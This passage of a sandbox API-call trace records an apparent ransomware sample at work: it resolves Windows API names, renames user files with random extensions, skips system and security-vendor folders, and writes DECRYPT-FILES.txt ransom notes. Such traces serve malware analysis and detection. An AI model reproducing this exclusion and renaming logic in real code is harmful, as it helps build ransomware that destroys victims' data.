lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0185.452] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0185.452] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0185.452] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0185.452] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0185.452] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0185.453] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0185.453] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0185.453] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0185.453] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0185.453] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0185.453] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0185.453] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0185.453] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0185.453] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0185.453] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0185.453] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0185.453] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0185.453] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0185.453] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0185.453] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0185.453] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0185.453] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0185.453] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0185.453] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0185.453] lstrlenA (lpString="CREATETHREAD") returned 12 [0185.453] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0185.453] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0185.453] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0185.453] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0185.453] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0185.453] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0185.453] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0185.453] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0185.453] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0185.453] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0185.453] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0185.453] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0185.453] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0185.453] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0185.453] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0185.453] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0185.453] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0185.454] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0185.454] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0185.454] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0185.454] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0185.454] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0185.454] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0185.454] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0185.454] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0185.454] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0185.454] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0185.454] lstrlenA (lpString="CTRLROUTINE") returned 11 [0185.454] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0185.454] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0185.454] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0185.454] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0185.454] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0185.454] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0185.454] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0185.454] lstrlenA (lpString="DEBUGBREAK") returned 10 [0185.454] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0185.454] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0185.454] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0185.454] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0185.454] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0185.454] lstrlenA (lpString="DECODEPOINTER") returned 13 [0185.454] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0185.454] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0185.454] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0185.454] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0185.454] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0185.454] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0185.454] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0185.454] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0185.454] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0185.454] lstrlenA (lpString="DELETEATOM") returned 10 [0185.454] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0185.454] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0185.454] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0185.455] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0185.455] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0185.455] lstrlenA (lpString="DELETEFIBER") returned 11 [0185.455] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0185.455] lstrlenA (lpString="DELETEFILEA") returned 11 [0185.455] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0185.455] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0185.455] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0185.455] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0185.455] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0185.455] lstrlenA (lpString="DELETEFILEW") returned 11 [0185.455] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0185.455] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0185.455] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0185.455] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0185.455] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0185.455] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0185.455] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0185.455] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0185.455] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0185.455] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0185.455] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0185.455] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0185.455] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0185.455] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0185.455] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0185.455] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0185.455] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0185.455] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0185.455] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0185.455] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0185.455] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0185.455] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0185.455] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0185.455] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0185.456] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0185.456] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0185.456] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0185.456] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0185.456] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0185.456] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0185.456] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0185.456] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0185.456] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0185.456] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0185.456] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0185.456] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0185.456] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0185.456] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0185.456] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0185.456] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0185.456] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0185.456] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0185.456] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0185.456] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0185.456] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0185.456] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0185.456] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0185.456] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0185.456] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0185.456] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0185.456] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0185.456] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0185.456] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0185.456] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0185.456] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0185.456] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0185.456] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0185.456] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0185.456] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0185.456] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0185.457] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0185.457] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0185.457] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0185.457] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0185.457] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0185.457] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0185.457] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0185.457] lstrcpyW (in: lpString1=0x8b0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0185.457] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Web Slice Gallery.url.pT0M") returned 72 [0185.457] wsprintfW (in: param_1=0x36fe25c, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Web Slice Gallery.url.pT0M.G6Gyd2h") returned 80 [0185.457] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Web Slice Gallery.url.pT0M" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\web slice gallery.url.pt0m"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Web Slice Gallery.url.pT0M.G6Gyd2h" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\web slice gallery.url.pt0m.g6gyd2h"), dwFlags=0x0) returned 1 [0185.458] VirtualFree (lpAddress=0x8a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.458] VirtualFree (lpAddress=0x8b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.459] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.459] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xaedd6ec0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x1ea, dwReserved0=0x0, dwReserved1=0x0, cFileName="Web Slice Gallery.url.pT0M", cAlternateFileName="WEBSLI~1.PT0")) returned 0 [0185.459] FindClose (in: hFindFile=0x4798b8 | out: hFindFile=0x4798b8) returned 1 [0185.459] CloseHandle (hObject=0x25c) returned 1 [0185.459] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xaee955a0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaee955a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft Websites", cAlternateFileName="MICROS~1")) returned 1 [0185.459] lstrcmpW (lpString1="Microsoft Websites", lpString2=".") returned 1 [0185.459] lstrcmpW (lpString1="Microsoft Websites", lpString2="..") returned 1 [0185.459] lstrcatW (in: lpString1="Microsoft Websites", lpString2="\\" | out: lpString1="Microsoft Websites\\") returned="Microsoft Websites\\" [0185.459] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\", lpString2="Microsoft Websites\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\" [0185.459] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\", lpSrch="\\Program Files") returned 0x0 [0185.459] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\", lpSrch=":\\Windows") returned 0x0 [0185.459] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\", lpSrch="\\Games\\") returned 0x0 [0185.459] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\", lpSrch="\\Tor Browser\\") returned 0x0 [0185.459] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\", lpSrch="\\ProgramData\\") returned 0x0 [0185.459] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0185.459] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0185.459] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0185.459] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\", lpSrch="\\All Users") returned 0x0 [0185.459] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\", lpSrch="\\IETldCache\\") returned 0x0 [0185.460] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\", lpSrch="\\Local Settings\\") returned 0x0 [0185.460] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\", lpSrch="\\AppData\\Local") returned 0x0 [0185.460] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\", lpSrch="AhnLab") returned 0x0 [0185.460] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0185.460] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\") returned 59 [0185.460] lstrlenW (lpString="0a16c9.tmp") returned 10 [0185.460] wsprintfW (in: param_1=0x36fea6c, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\\\0a16c9.tmp") returned 70 [0185.460] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x25c [0185.462] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\") returned 59 [0185.462] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0185.462] wsprintfW (in: param_1=0x36fea6c, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\\\DECRYPT-FILES.txt") returned 77 [0185.462] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0185.463] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\") returned 59 [0185.463] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\*" [0185.463] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\*", lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xf14109c0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xf14109c0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4798b8 [0185.463] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0185.463] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xf14109c0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xf14109c0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0185.463] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0185.463] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0185.463] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf14109c0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xf14109c0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xf14109c0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="0a16c9.tmp", cAlternateFileName="")) returned 1 [0185.463] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="DECRYPT-FILES.txt") returned -1 [0185.463] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="autorun.inf") returned -1 [0185.463] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="boot.ini") returned -1 [0185.463] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="desktop.ini") returned -1 [0185.463] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat") returned -1 [0185.463] lstrcmpiW 